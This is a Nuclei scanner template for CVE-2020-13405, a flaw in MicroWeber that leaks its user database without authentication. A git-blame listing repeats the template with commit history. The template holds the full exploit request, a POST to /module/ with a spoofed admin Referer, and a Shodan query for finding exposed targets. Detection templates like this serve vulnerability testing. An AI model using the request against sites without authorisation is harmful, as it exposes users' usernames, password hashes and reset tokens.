nuclei-templates/cves/2020/CVE-2020-13405.yaml

id: CVE-2020-13405

info:
  name: MicroWeber - Unauthenticated User Database Disclosure
  author: ritikchaddha,amit-jd
  severity: high
  description: |
    The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
  reference:
    - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13405
  metadata:
    verified: true
    shodan-query: http.html:"microweber"
  tags: cve,cve2020,microweber,unauth

requests:
  - raw:
      - |
        POST /module/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{BaseURL}}admin/view:modules/load_module:users

        module=users/controller

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"username")'
          - 'contains(body,"password")'
          - 'contains(body,"password_reset_hash")'
          - 'status_code==200'
          - 'contains(all_headers,"text/html")'
        condition: and
Create CVE-2020-13405 MicroWeber - Unauthenticated User Database Disclosure 2022-07-28 10:04:27 +00:00			`id: CVE-2020-13405`

			`info:`
			`name: MicroWeber - Unauthenticated User Database Disclosure`
Update CVE-2020-13405.yaml 2022-07-28 12:21:27 +00:00			`author: ritikchaddha,amit-jd`
			`severity: high`
			`description: \|`
			`The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.`
Create CVE-2020-13405 MicroWeber - Unauthenticated User Database Disclosure 2022-07-28 10:04:27 +00:00			`reference:`
			`- https://rhinosecuritylabs.com/research/microweber-database-disclosure/`
Update CVE-2020-13405.yaml 2022-07-28 12:21:27 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-13405`
			`metadata:`
			`verified: true`
			`shodan-query: http.html:"microweber"`
Update CVE-2020-13405.yaml 2022-07-28 14:48:58 +00:00			`tags: cve,cve2020,microweber,unauth`
Create CVE-2020-13405 MicroWeber - Unauthenticated User Database Disclosure 2022-07-28 10:04:27 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /module/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`Referer: {{BaseURL}}admin/view:modules/load_module:users`

Update CVE-2020-13405.yaml 2022-07-28 14:48:58 +00:00			`module=users/controller`
Create CVE-2020-13405 MicroWeber - Unauthenticated User Database Disclosure 2022-07-28 10:04:27 +00:00
removed trailing spaces 2022-07-28 10:25:14 +00:00			`matchers:`
Create CVE-2020-13405 MicroWeber - Unauthenticated User Database Disclosure 2022-07-28 10:04:27 +00:00			`- type: dsl`
			`dsl:`
			`- 'contains(body,"username")'`
			`- 'contains(body,"password")'`
			`- 'contains(body,"password_reset_hash")'`
			`- 'status_code==200'`
			`- 'contains(all_headers,"text/html")'`
removed trailing spaces 2022-07-28 10:25:14 +00:00			`condition: and`